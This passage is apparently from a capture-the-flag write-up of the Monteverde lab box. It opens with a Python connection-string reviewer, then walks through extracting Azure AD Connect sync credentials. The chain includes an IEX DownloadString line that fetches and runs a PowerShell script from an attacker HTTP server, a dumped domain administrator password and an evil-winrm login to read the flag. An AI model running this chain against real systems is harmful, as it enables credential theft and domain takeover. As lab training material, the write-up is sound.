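```python
import re

# Connection strings quoted in the writeup: the referenced script's LocalDB
# default, and the one that worked against this host.
SCRIPT_DEFAULT = r"Data Source=(localdb)\.\ADSync;Initial Catalog=ADSync"
HOST_STRING = "Data Source=MONTEVERDE;Initial Catalog=ADSync;Trusted_Connection=True"
# Constructed contrast case carrying the settings a reviewer should reject.
WEAK_EXAMPLE = "Server=MONTEVERDE;Database=ADSync;User ID=sa;Password=PLACEHOLDER;Encrypt=false"

# SqlClient accepts several spellings for the same keyword; map them to one.
SYNONYMS = {
    "data source": "Data Source", "server": "Data Source", "address": "Data Source",
    "addr": "Data Source", "network address": "Data Source",
    "initial catalog": "Initial Catalog", "database": "Initial Catalog",
    "integrated security": "Integrated Security",
    "trusted_connection": "Integrated Security",
    "user id": "User ID", "uid": "User ID", "user": "User ID",
    "password": "Password", "pwd": "Password",
    "encrypt": "Encrypt", "trustservercertificate": "TrustServerCertificate",
}
# key = value ; where the value may be "double-quoted" or 'single-quoted'
# (quoting is how a value that itself contains ';' is written).
_PAIR = re.compile(r"""([^=;]+?)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^;]*))\s*(?:;|$)""")
TRUE_WORDS = ("true", "yes", "sspi")

def parse_connection_string(cs):
    """Split an ADO.NET connection string into normalised key -> value."""
    result, pos = {}, 0
    while pos < len(cs):
        if cs[pos] in " ;":                  # tolerate stray separators
            pos += 1
            continue
        m = _PAIR.match(cs, pos)
        if not m:
            raise ValueError("malformed connection string near %r" % cs[pos:pos + 20])
        raw_key = m.group(1).strip()
        value = next(v for v in m.groups()[1:] if v is not None).strip()
        result[SYNONYMS.get(raw_key.lower(), raw_key)] = value
        pos = m.end()
    return result

def classify_instance(data_source):
    """Which kind of SQL Server endpoint a Data Source value names."""
    if data_source.lower().startswith("(localdb)"):
        return "localdb"                     # user-mode LocalDB, as in the script's default
    host, sep, _instance = data_source.partition("\\")
    if sep:
        return "named-instance"              # HOST\INSTANCE
    if host in ("", ".", "(local)", "localhost"):
        return "local-default-instance"
    return "default-instance"                # HOST, default instance (TCP 1433)

def review_connection_string(cs):
    """Classify the string and flag settings that weaken it."""
    kv = parse_connection_string(cs)
    integrated = kv.get("Integrated Security", "").lower() in TRUE_WORDS
    auth = "integrated" if integrated else "sql-login" if "User ID" in kv else "not specified"
    findings = []
    if "Password" in kv:
        findings.append("password embedded in connection string")
    if kv.get("Encrypt", "").lower() in ("false", "no"):
        findings.append("transport encryption disabled")
    if kv.get("TrustServerCertificate", "").lower() in TRUE_WORDS:
        findings.append("server certificate not validated")
    return {"instance": classify_instance(kv.get("Data Source", "")),
            "database": kv.get("Initial Catalog"), "auth": auth, "findings": findings}

if __name__ == "__main__":
    for label, cs in (("script default", SCRIPT_DEFAULT), ("host", HOST_STRING),
                      ("weak", WEAK_EXAMPLE)):
        print(label, review_connection_string(cs))
```

For the string that worked on this host the reviewer output is a default instance on MONTEVERDE, database ADSync, integrated authentication and no findings; the point of the weak example is that the same parser turns an embedded `Password=` or `Encrypt=false` into a finding before such a string ships in a config file or a scheduled script.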

Before running the script, I confirmed that one other file key to this whole operation was present.

*Evil-WinRM* PS C:\Users\mhope\Documents> dir 'C:\Program Files\Microsoft Azure AD Sync\Bin\mcrypt.dll'


Directory: C:\Program Files\Microsoft Azure AD Sync\Bin


Mode LastWriteTime Length Name
---- ------------- ------ ----
-a---- 8/31/2018 4:54 PM 335744 mcrypt.dll

With a working connection string and the DLL present on the host, all that was left was for me to tweak the PowerShell file, host it on an HTTP server, and then run it on the target.

```shell
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ cat AzureADConnect.ps1
Write-Host "AD Connect Sync Credential Extract POC (@_xpn_)`n"

$client = new-object System.Data.SqlClient.SqlConnection -ArgumentList "Data Source=MONTEVERDE;Initial Catalog=ADSync;Trusted_Connection=True"
...
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
```

```powershell
*Evil-WinRM* PS C:\Users\mhope\Downloads> IEX (New-Object Net.WebClient).DownloadString('http://10.10.14.110:8000/AzureADConnect.ps1')
AD Connect Sync Credential Extract POC (@_xpn_)

Domain: MEGABANK.LOCAL
Username: administrator
Password: d********!
```

Even though the article said this would work, I was still blown away by just how simple this was once I knew where to look. Interestingly enough, I was expecting credentials for the *AAD_987d7f2f57d2* user, but instead I got the password for *Administrator*. This may be because *Administrator* was configured as the user to do the credential synchronization? Had this not been the case, my next step would have been to use Impacket's `secretsdump.py` remotely (logging in with these credentials) to dump *Administrator*'s NTLM hash (which could then be used with pass-the-hash).

But, since this saved me a step, I logged in using WinRM and grabbed the flag.

```shell
msaxena@Mayur-Laptop:/mnt/c/Users/Mayur/Documents/Monteverde$ evil-winrm -i 10.10.10.172 -u 'megabank\administrator' -p 'd********!'
Evil-WinRM shell v2.3

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\Administrator\Documents> dir ..\Desktop


Directory: C:\Users\Administrator\Desktop


Mode LastWriteTime Length Name
---- ------------- ------ ----
-ar--- 1/3/2020 5:48 AM 32 root.txt


*Evil-WinRM* PS C:\Users\Administrator\Documents> type ..\Desktop\root.txt
129........0bc
```
